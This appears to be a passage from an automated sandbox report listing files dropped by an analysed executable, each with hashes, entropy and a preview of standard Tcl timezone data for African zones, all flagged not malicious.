                                                                                                                                                                                                                              SHA-512:AAA32FD1B01BFECDD0D1C9C1DF1163374DAFE094C75720EA4095C34F7EAE7DCB594D1A7F6A2A90FB43FF01020F7AEB48E92496E0EE2D039AF23076CD369DD2A7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Harare) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):309
                                                                                                                                                                                                                              Entropy (8bit):4.695542624694403
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2DWbzDm2OHePoHvmmXsd//HF2d7d6VcF2d6KsYov:MB862DW7mdHePCvmmcZvF0cVcF/KsFv
                                                                                                                                                                                                                              MD5:F0E153FC9B978E30742ABC025CA45E02
                                                                                                                                                                                                                              SHA1:73D96F3188190DAC2453E6F18A1C683CECB9CDE3
                                                                                                                                                                                                                              SHA-256:5EEF6475E1312051037FCAE3354E32DC0910BE7A5116B71F8CCBE1CCA08D3F1C
                                                                                                                                                                                                                              SHA-512:E66F4B5FF18BAAD53AFB1ED36A0827115C793075A61F794F26F32BC9F6799DF816A1F817BEB0C0BC938F89E6F5BFBE1AB4F504F1AF518764103FB287746552C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Johannesburg) {.. {-9223372036854775808 6720 0 LMT}.. {-2458173120 5400 0 SAST}.. {-2109288600 7200 0 SAST}.. {-860976000 10800 1 SAST}.. {-845254800 7200 0 SAST}.. {-829526400 10800 1 SAST}.. {-813805200 7200 0 SAST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1127
                                                                                                                                                                                                                              Entropy (8bit):4.027824722230131
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5mesdOkMV0GbMSHMzNy8MXLwM0JXMfCsMzaMq0QM3W50dM44R8M1XMreM7p0z8M5:5YMV04MSHMzNxMbwM0JXMfCsMzaMq0QJ
                                                                                                                                                                                                                              MD5:32EC0589260D9D4BCC85FE91E6F04D00
                                                                                                                                                                                                                              SHA1:BAA269852C4AC6B89EA7941E7A75A007E0CF9EDF
                                                                                                                                                                                                                              SHA-256:F2646E15488ABF2E960759CEFE5705416E71DA71BB8407B26196244FD1A3394F
                                                                                                                                                                                                                              SHA-512:4F485453BE1D186ADBE0908852475C63C57BA498091C222EFFB9A5FEA2DB7F55E1BB2DBDBF6AC0F24CC67D47549FA3F5257655B5449B1BCF1FB5CDB27B03D501
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Juba) {.. {-9223372036854775808 7588 0 LMT}.. {-1230775588 7200 0 CAT}.. {10360800 10800 1 CAST}.. {24786000 7200 0 CAT}.. {41810400 10800 1 CAST}.. {56322000 7200 0 CAT}.. {73432800 10800 1 CAST}.. {87944400 7200 0 CAT}.. {104882400 10800 1 CAST}.. {119480400 7200 0 CAT}.. {136332000 10800 1 CAST}.. {151016400 7200 0 CAT}.. {167781600 10800 1 CAST}.. {182552400 7200 0 CAT}.. {199231200 10800 1 CAST}.. {214174800 7200 0 CAT}.. {230680800 10800 1 CAST}.. {245710800 7200 0 CAT}.. {262735200 10800 1 CAST}.. {277246800 7200 0 CAT}.. {294184800 10800 1 CAST}.. {308782800 7200 0 CAT}.. {325634400 10800 1 CAST}.. {340405200 7200 0 CAT}.. {357084000 10800 1 CAST}.. {371941200 7200 0 CAT}.. {388533600 10800 1 CAST}.. {403477200 7200 0 CAT}.. {419983200 10800 1 CAST}.. {435013200 7200 0 CAT}.. {452037600 10800 1 CAST}.. {466635600 7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.837466713772859
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcJEl2DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DIEl2V
                                                                                                                                                                                                                              MD5:E929ED1BC316C71AABE7E625BD562FB1
                                                                                                                                                                                                                              SHA1:C20C172518C02D93327F4BBBC5D410BFFEF5039D
                                                                                                                                                                                                                              SHA-256:8EA3028CE2B025F0C457DC8F7601279CA5AF565A88B9FE80208F9F1030F2B0D0
                                                                                                                                                                                                                              SHA-512:B2FBCF06EACCF18DE97AF1D6BC57D9638E0A36DBF17044FF97F6B9E5089CF9E13E1304F304495324C0ACC1128A7D2D494E7C1FDB95DB0855FCE54F7028096C50
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Kampala) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1131
                                                                                                                                                                                                                              Entropy (8bit):4.0421745451318385
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5xe9dSXMV0GbMSHMzNy8MXLwM0JXMfCsMzaMq0QM3W50dM44R8M1XMreM7p0z8MM:5hMV04MSHMzNxMbwM0JXMfCsMzaMq0Qc
                                                                                                                                                                                                                              MD5:2BD3850DDBE2F05BF6F24F3AEFF7516C
                                                                                                                                                                                                                              SHA1:22B0DBB54E071F30D51A8654CF103F99537F74CD
                                                                                                                                                                                                                              SHA-256:F475DB8A857A46B310B12C21D6A9BC6CA9FF2960DA429A9D57FA375F9439E13B
                                                                                                                                                                                                                              SHA-512:1CF82FC07348C697F26625673DA7E3D734358B3FBE69D8E2132CAC0D9F00C7E8CDC353676CD9BAC4CBB9E26CF6638CEAE41DF559E7445D9C453409D7115FFC6C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Khartoum) {.. {-9223372036854775808 7808 0 LMT}.. {-1230775808 7200 0 CAT}.. {10360800 10800 1 CAST}.. {24786000 7200 0 CAT}.. {41810400 10800 1 CAST}.. {56322000 7200 0 CAT}.. {73432800 10800 1 CAST}.. {87944400 7200 0 CAT}.. {104882400 10800 1 CAST}.. {119480400 7200 0 CAT}.. {136332000 10800 1 CAST}.. {151016400 7200 0 CAT}.. {167781600 10800 1 CAST}.. {182552400 7200 0 CAT}.. {199231200 10800 1 CAST}.. {214174800 7200 0 CAT}.. {230680800 10800 1 CAST}.. {245710800 7200 0 CAT}.. {262735200 10800 1 CAST}.. {277246800 7200 0 CAT}.. {294184800 10800 1 CAST}.. {308782800 7200 0 CAT}.. {325634400 10800 1 CAST}.. {340405200 7200 0 CAT}.. {357084000 10800 1 CAST}.. {371941200 7200 0 CAT}.. {388533600 10800 1 CAST}.. {403477200 7200 0 CAT}.. {419983200 10800 1 CAST}.. {435013200 7200 0 CAT}.. {452037600 10800 1 CAST}.. {466635600 7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.910322325134086
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcCJRx+DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DRX+DEi
                                                                                                                                                                                                                              MD5:3017253E1C6ACCA8D470A014E4BB321D
                                                                                                                                                                                                                              SHA1:671B7AC04580B56E2C34F88D123E8296947DDD7E
                                                                                                                                                                                                                              SHA-256:73FEB807006897B4B485CB82394867444E890265EFE960EC66D6C0E325DA9372
                                                                                                                                                                                                                              SHA-512:2498C380D761A16C183D78BC1BB18B1D2A1BFCB9C703D86A3FC04CCCE43D88C8D4BC3C47CC31639B78A5FE9C8A7445E9DBB52062E2F3B737DA1E7D0FF70F140A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Kigali) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.866127364448228
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcqQFeDcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DdD4yn
                                                                                                                                                                                                                              MD5:41209A335A99803239A854575190C5ED
                                                                                                                                                                                                                              SHA1:E6EA627C25513B9DDE053F9A24D509AA317C30A1
                                                                                                                                                                                                                              SHA-256:611375C4901AD6C4844C2BB7D02FB17F34996F49E642546A6784D6F0B28530CC
                                                                                                                                                                                                                              SHA-512:DF2C0B131F35F54DF5EBF7F8459F98DBABEB6F081247BA95B5D7B41146E2A2EF9BC6B1D909DE57A1223D9C258AB197D9668ED2E111A365C86BABDAA7DF551FB6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Kinshasa) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):235
                                                                                                                                                                                                                              Entropy (8bit):4.7936510664790815
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2D4JDm2OHWQvvoHvBsp9boFvoHzIX7uRe6vF9:MB862DymdHWQCvqpmVCzIq
                                                                                                                                                                                                                              MD5:EC08046589E85D999A597252FF5368B7
                                                                                                                                                                                                                              SHA1:126E3DE158E1E7AF4737D0AB5B51C0F92F416DC7
                                                                                                                                                                                                                              SHA-256:DCC9F52F539A67DFD7ABAFDE072ACDAE2B67754C559C8A5FE61979F5A286A066
                                                                                                                                                                                                                              SHA-512:84B9AB18BC343C8B8934F5FDD2E2EB413925B04D6F5394AA8337B7B55E6487FB071A83A69BD4D0FA40F7F31EBC57B9908729674542CEA3083D700FCD02D77633
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Lagos) {.. {-9223372036854775808 815 0 LMT}.. {-2035584815 0 0 GMT}.. {-1940889600 815 0 LMT}.. {-1767226415 1800 0 +0030}.. {-1588465800 3600 0 WAT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.865878143076229
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcr7bp4DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dgfp4D4y
                                                                                                                                                                                                                              MD5:35D8A58EE21E603C6FC4FB896AE6B3D0
                                                                                                                                                                                                                              SHA1:F1D0A939D761F3F0954F045814CF5339A5597036
                                                                                                                                                                                                                              SHA-256:AB3E797548C7663CF9ABA7FE163635FF7CAB9E6CB61FA1644C0F7B4B5CCE8B99
                                                                                                                                                                                                                              SHA-512:97717961987F6B6832C24A7833150CDFE7E82BBEB32DFDB84D2500442AAD9263F8BD4E879591E913D56E9A1991C389EF730211853647A889F358AE3FA37C0185
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Libreville) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.862780607964543
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcih4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DNh4D4
                                                                                                                                                                                                                              MD5:EA21ABBF8B11953916A1C509B8A1B427
                                                                                                                                                                                                                              SHA1:35ADC230C57B001BE8A99A3D2E34B609A60A1162
                                                                                                                                                                                                                              SHA-256:EACA9124F17E5B11F27D11FA6141D19EB3AC23E155E155B73467BDAA3BC99AA7
                                                                                                                                                                                                                              SHA-512:A7972D4F1C5FB988CA04B39E2CDD580F51383BA9D7A66C478275C11A07B8D7A6EFF53A3E1929B0D89F10BCC39D22F285DB2601ED60DB4647C65465643F70C137
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Lome) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.856982839546061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DccLtBQDcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DXQD4yn
                                                                                                                                                                                                                              MD5:40CD47F6DCF51EBEFEF42489F1716257
                                                                                                                                                                                                                              SHA1:DF245192A1899A72DE01A57F6969AC060E841734
                                                                                                                                                                                                                              SHA-256:4C2FD1E44DFAAF0C0DD2EB56B84B538F1E2D84B301AB2CFB8EE7759783501444
                                                                                                                                                                                                                              SHA-512:D39BEB0EEF344B1A44F7D6A806A1D5B956D7D402648EE0C67C4BA46493236840AF975D89A91B2D33B8AA7D6DC9A051E66718DCDBC1C83B0E964215C2E32ED923
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Luanda) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.940313336280723
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcfpT0DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2D8pT0Dt
                                                                                                                                                                                                                              MD5:71A5DE1276902DB1542840318F9B1AF3
                                                                                                                                                                                                                              SHA1:AC3825BF343482E0E4D9D6FAA6FCA4D1A125433B
                                                                                                                                                                                                                              SHA-256:24384EEC359FD24D181AAEF3C017E3C345490A8D352B29D19B1B143A29A811C2
                                                                                                                                                                                                                              SHA-512:2984EB42A79B8B32BB93DFE71F1C4C0CABFDC9B0A199971347BB3473463FA07FDB5D20227D288BF8653B1BDE347E1297459BBB4C3C34AF7A5434FBF945683577
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Lubumbashi) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.905174746463853
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcOf+DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DkDEi
                                                                                                                                                                                                                              MD5:1D7FDB388535CC59742CA0F1AEE27FBD
                                                                                                                                                                                                                              SHA1:A99FF2CAC47FD333429C22B271E190D979EEC024
                                                                                                                                                                                                                              SHA-256:B00801A7279741434D9C2D7EC7322DD93B85EA4F5C9976AB3A43F0AB142E1553
                                                                                                                                                                                                                              SHA-512:0174D3C6F9116C36C62AD1EB58203EE7DFE8C37F618B8449D5E45AD6290CF8334F28798877D7A563A12EE533026244D6A49BCCF29B5D7FCB5BCC91481D0DDDE2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Lusaka) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.857096806490649
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcn2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2D42D4yn
                                                                                                                                                                                                                              MD5:1CA9B3E7BCD5BC1CC881453D16B09389
                                                                                                                                                                                                                              SHA1:1B1964B314E72847D71A42C147CF2BF331B44461
                                                                                                                                                                                                                              SHA-256:35D56EFFE9E7E60F17B32BD30486E566B635F0AE7A8948D77395B8E6332E26F1
                                                                                                                                                                                                                              SHA-512:9E08D57B7824F5B076D159D9A5106E51450DF24729C36F485B9B68E8F47E8DFC50F9BEC3F11E0AE6579A8E372A5C0F0DA18A2E797CF2115519D1B4E5B64413DD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Malabo) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):149
                                                                                                                                                                                                                              Entropy (8bit):4.952872531197478
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2DcfKiMXGm2OHoVoHvdSF2I:SlSWB9eg/2DEZDm2OHoVoHvdI
                                                                                                                                                                                                                              MD5:CD429B6891CBF603A93F9A9733E2391B
                                                                                                                                                                                                                              SHA1:C6833B83B6D1694AC632018A27915E6F97F708AE
                                                                                                                                                                                                                              SHA-256:FE6B6A4BE1B61F7F909A3F6137530DFE6D1754499A4D9B0D1CE4952FFF0AE62D
                                                                                                                                                                                                                              SHA-512:6E57B70B71515998AD617954F9DDAE19968B20946542201153DAB47FBE63790D42F41AE29148ECBCE6D12812879BCF0A4EC881507B62CDB2675AB20267220BF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Maputo) {.. {-9223372036854775808 7820 0 LMT}.. {-2109291020 7200 0 CAT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):199
                                                                                                                                                                                                                              Entropy (8bit):4.964472328419063
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7HbsSHAIgNTzbrN/2DZQs+DWb4n:MByMaHw7NH/t2DZiDWU
                                                                                                                                                                                                                              MD5:88C8FF2B480648EDADBD0FB93F754275
                                                                                                                                                                                                                              SHA1:BED7A784C378909914CEB0D303DFE6D05FD576B7
                                                                                                                                                                                                                              SHA-256:1D80FD86CB733D57D88ECD404E702F750B233ED0CCBFBFFFEED1AAD3B7F1CB04
                                                                                                                                                                                                                              SHA-512:CB7F831CF099E85B948AE57FCE9D91C7EAAD39753AF82C56EC15B65830EB4115A71BBC83A71A2AC947CAB24DEDDB557E02FAA5A3264546AE6E60607DF6BD2FA3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Johannesburg)]} {.. LoadTimeZoneFile Africa/Johannesburg..}..set TZData(:Africa/Maseru) $TZData(:Africa/Johannesburg)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):200
                                                                                                                                                                                                                              Entropy (8bit):4.957246428185456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7HbsSHAIgNTzbrN/2DzjEHp4DWb4n:MByMaHw7NH/t2DzjEJ4DWU
                                                                                                                                                                                                                              MD5:CA7255B86425BA706D214924856B6818
                                                                                                                                                                                                                              SHA1:E9BE6CF871BB1786E842953D41392299952EC9AC
                                                                                                                                                                                                                              SHA-256:547197C09C1987350AE5720A4EEC7E8D8F4B9F4A0559726E225E13C707F7C564
                                                                                                                                                                                                                              SHA-512:23F9AD0F926A0945A17BBC3DCFF9A3D7EE68EC9423EA78985F5FFC60CC61641B57871F9AA703B5FB9BE842DCD4693D0641F9EDED702240873F58D24CD4D60C32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Johannesburg)]} {.. LoadTimeZoneFile Africa/Johannesburg..}..set TZData(:Africa/Mbabane) $TZData(:Africa/Johannesburg)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.877126792757121
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcBEBXCEeDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DFSVDR
                                                                                                                                                                                                                              MD5:5C2E2B5189E0E816D5BD7AFC8B49A35E
                                                                                                                                                                                                                              SHA1:4E43A1ED51399528636D6442B1DDFFD820911407
                                                                                                                                                                                                                              SHA-256:25E221BE49DEC5547A74AEB91B0041859C59BC866987272A447AB2343D1CC30C
                                                                                                                                                                                                                              SHA-512:B74735CFAB692756BAADFB1A51A8CC0C986F981D8E7E7A8182370A9017E67439875F0115820A349AFB3BE2FA581A721440968EF817471DD2C5E1286E53B2FE99
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Mogadishu) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):208
                                                                                                                                                                                                                              Entropy (8bit):4.8660011420394955
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2D3NPDm2OHrFGxYoHvlHIg5pTwdPsy:MB862D3NbmdHhmYCvdIg5GPsy
                                                                                                                                                                                                                              MD5:1B3C94B5098E454981C73C1F2AF80164
                                                                                                                                                                                                                              SHA1:1EBA9E2DBEA70BB1AE5EB13739518AB5A62D2130
                                                                                                                                                                                                                              SHA-256:2BF0D90610211651127402680519B29AB50B15D344263D0C1A22EDEBE5E01E27
                                                                                                                                                                                                                              SHA-512:DA4A0BCE7C6750BD7D3BA76B6301B9390723BE0C001C39BE453D80BD87020C2253A75629F68F83C19410D2A75FAF5223A435299CD4AA53DE545EC7C5B5AA54B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Monrovia) {.. {-9223372036854775808 -2588 0 LMT}.. {-2776979812 -2588 0 MMT}.. {-1604359012 -2670 0 MMT}.. {63593070 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):277
                                                                                                                                                                                                                              Entropy (8bit):4.655052651600954
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2Dk1Dm2OHsvT5oH99VCV22ufPnVCkVBKBQn9q:MB862DGmdHsvVCjkifvdH9q
                                                                                                                                                                                                                              MD5:B640661FB37BB74FAB172DBDF1B433E1
                                                                                                                                                                                                                              SHA1:0236A5B53443A4A18B8B9D6AA7732620BE9A6553
                                                                                                                                                                                                                              SHA-256:BD8E9765174431C0D403249D3E881C949C83966E9F8162552DA88AE53132467B
                                                                                                                                                                                                                              SHA-512:53DCC6DF7C3E0B00A6D98A8DCC4988C8CFD6B53CC89E6F8D32DA41CB532A62D9C6A823675C5039F5639CE0D423F6D571F46F5B93FFC7EFFB4EDFFBF89D46AA12
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
